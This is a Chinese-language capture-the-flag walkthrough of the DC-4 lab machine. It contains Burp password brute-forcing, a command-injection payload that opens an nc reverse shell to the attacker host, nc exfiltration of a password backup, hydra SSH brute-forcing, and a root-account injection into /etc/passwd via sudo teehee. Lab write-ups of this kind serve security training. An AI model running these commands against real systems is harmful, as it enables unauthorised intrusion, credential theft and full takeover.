文章目录
描述:从靶机DC-3开始,只有一个入口和一个最终的flag,
只有拿到root权限才可以发现最终的flag,DC-4也是一样
环境版本:
- VMware pro 16
- Kali 2021.1(虚拟机)
- DC-4(虚拟机)
该实验因个人原因,网络更换若干次,请自行判断 ip 属于靶机还是攻击机
一、信息收集
1.主机发现
arp-scan -l
发现靶机 ip
2.端口扫描
nmap -A -p- 192.168.43.35
发现其开启了 22 端口,ssh 服务
80 端口,Nginx 服务
二、漏洞挖掘
1.访问目标 ip,查看内容
发现是一个信息系统登入界面,提示用户名为 admin
2.使用 BP 进行爆破密码
1)准备密码本,没有可以使用 kali john工具的密码本,位置:
/usr/share/john/password.lst cp /usr/share/john/password.lst ./1.txt #复制到桌面(在桌面打开的终端)
2)使用 BP 进行抓包
3)发送到 intruder,设置爆破点
4)加载密码本
5)设置线程,我这设置的太大了,爆完之后502了…,重启DC-4,呜呜呜
6)查看爆破结果,得到密码 happy
3.使用密码登陆
发现有命令选项,进入后发现有命令列表,选中命令点击 run 发现可以执行
4.使用 BP 查看执行命令流量包
发现明文命令,并使用 ‘+’ 替换空格
5.替换命令来使用 nc 建立连接
1)攻击机监听端口:
nc -lvvp 233
2)BP 改包连接 nc
radio=nc+KALIIP+233+-e+/bin/sh&submit=Run
使用 ls 测试,发现成功连接
6.收集信息
发现 home 目录有三个用户:charles、jim、sam
jim 目录下有 backups 目录,和 test.sh 文件,查看该文件
发现作者整活
查看 backups 目录,发现密码备份,结合上边 ssh 服务,怀疑是 ssh 密码,
7.使用 nc 将靶机文件传输到攻击机
攻击机监听: nc -lp 1234 >old-passwords.bak
靶机 shell 发送:(下方为攻击机 ip)
nc 192.168.1.131 1234 <./old-passwords.bak
8.使用 hydra 爆破 ssh 密码
新建 users.txt 将三个用户每行一个写入保存
hydra -L users.txt -P old-passwords.bak 192.168.1.111 ssh -t 60 -o passwd.txt #别忘更改 ip 为你的靶机 ip
得到 jim ssh 密码
9.ssh 登陆,进行信息收集
ssh jim@192.168.1.111
1)发现邮件,查找邮件相关
得到 charles 账户密码 ^xHhA&hvim0y
2)查看 jim 可执行 sudo 得命令
发现不行
3)使用 charles 账户登陆,查看 sudo 可执行命令
发现 teehee :-a 写入文件内容,不覆盖文件
10.提权
使用teehee创建空密码账号,并将其加入 root 组
echo "huang::0:0:::/bin/bash" | sudo teehee -a /etc/passwd